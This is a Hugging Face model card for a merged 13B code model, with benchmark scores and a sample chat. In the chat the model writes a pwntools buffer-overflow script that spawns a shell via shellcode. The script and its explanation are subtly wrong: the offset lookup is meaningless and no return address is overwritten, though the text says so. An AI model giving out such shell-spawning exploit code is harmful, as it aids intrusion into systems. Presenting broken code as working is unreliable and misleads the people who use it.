Winged-Lagomorph-2x13B / README.md

lodrick-the-lafted

Adding Evaluation Results

cccac5d verified 9 months ago

preview code

raw

history blame

No virus

7.65 kB

	---
	license: llama2
	tags:
	- moe
	- merge
	base_model: codellama/CodeLlama-13b-Instruct-hf
	model-index:
	- name: Winged-Lagomorph-2x13B
	results:
	- task:
	type: text-generation
	name: Text Generation
	dataset:
	name: AI2 Reasoning Challenge (25-Shot)
	type: ai2_arc
	config: ARC-Challenge
	split: test
	args:
	num_few_shot: 25
	metrics:
	- type: acc_norm
	value: 47.95
	name: normalized accuracy
	source:
	url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	name: Open LLM Leaderboard
	- task:
	type: text-generation
	name: Text Generation
	dataset:
	name: HellaSwag (10-Shot)
	type: hellaswag
	split: validation
	args:
	num_few_shot: 10
	metrics:
	- type: acc_norm
	value: 69.39
	name: normalized accuracy
	source:
	url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	name: Open LLM Leaderboard
	- task:
	type: text-generation
	name: Text Generation
	dataset:
	name: MMLU (5-Shot)
	type: cais/mmlu
	config: all
	split: test
	args:
	num_few_shot: 5
	metrics:
	- type: acc
	value: 44.5
	name: accuracy
	source:
	url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	name: Open LLM Leaderboard
	- task:
	type: text-generation
	name: Text Generation
	dataset:
	name: TruthfulQA (0-shot)
	type: truthful_qa
	config: multiple_choice
	split: validation
	args:
	num_few_shot: 0
	metrics:
	- type: mc2
	value: 44.54
	source:
	url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	name: Open LLM Leaderboard
	- task:
	type: text-generation
	name: Text Generation
	dataset:
	name: Winogrande (5-shot)
	type: winogrande
	config: winogrande_xl
	split: validation
	args:
	num_few_shot: 5
	metrics:
	- type: acc
	value: 67.4
	name: accuracy
	source:
	url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	name: Open LLM Leaderboard
	- task:
	type: text-generation
	name: Text Generation
	dataset:
	name: GSM8k (5-shot)
	type: gsm8k
	config: main
	split: test
	args:
	num_few_shot: 5
	metrics:
	- type: acc
	value: 25.63
	name: accuracy
	source:
	url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	name: Open LLM Leaderboard
	---

	Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo template for regular code, and the NR template for function calling.
	<img src=https://huggingface.co/lodrick-the-lafted/Winged-Lagomorph-2x13B/resolve/main/winged-lago.png>

	SYSTEM: Answer the Question by exploring multiple reasoning paths as follows:
	- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
	- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
	- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
	- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
	- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
	- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
	- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
	- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
	In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.

	USER: Write a pwntools scriptthat overflows a 64 character buffer from stdin.
	ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps:

	1. Identify the vulnerable program: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`.
	2. Set up the environment: Install pwntools and any other necessary dependencies.
	3. Create a pwntools script: Start by importing the `pwn` module and setting up the connection to the vulnerable program.
	4. Find the offset: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset.
	5. Overflow the buffer: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack.
	6. Control the execution flow: Overwrite the return address with the address of a shellcode or a function that will give us a shell.
	7. Execute the script: Run the script and observe the results.

	Here's an example pwntools script that overflows a 64-character buffer:

	```python
	from pwn import *

	# Set up the connection to the vulnerable program
	p = process('./vulnerable_program')

	# Find the offset using cyclic
	offset = cyclic_find(b'A'*64)

	# Generate shellcode
	shellcode = asm(shellcraft.sh())

	# Overflow the buffer
	payload = b'A' * offset + shellcode
	p.sendline(payload)

	# Execute the script
	p.interactive()
	```

	In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs.

	Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with.
	# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
	Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_lodrick-the-lafted__Winged-Lagomorph-2x13B)

	\| Metric \|Value\|
	\|---------------------------------\|----:\|
	\|Avg. \|49.90\|
	\|AI2 Reasoning Challenge (25-Shot)\|47.95\|
	\|HellaSwag (10-Shot) \|69.39\|
	\|MMLU (5-Shot) \|44.50\|
	\|TruthfulQA (0-shot) \|44.54\|
	\|Winogrande (5-shot) \|67.40\|
	\|GSM8k (5-shot) \|25.63\|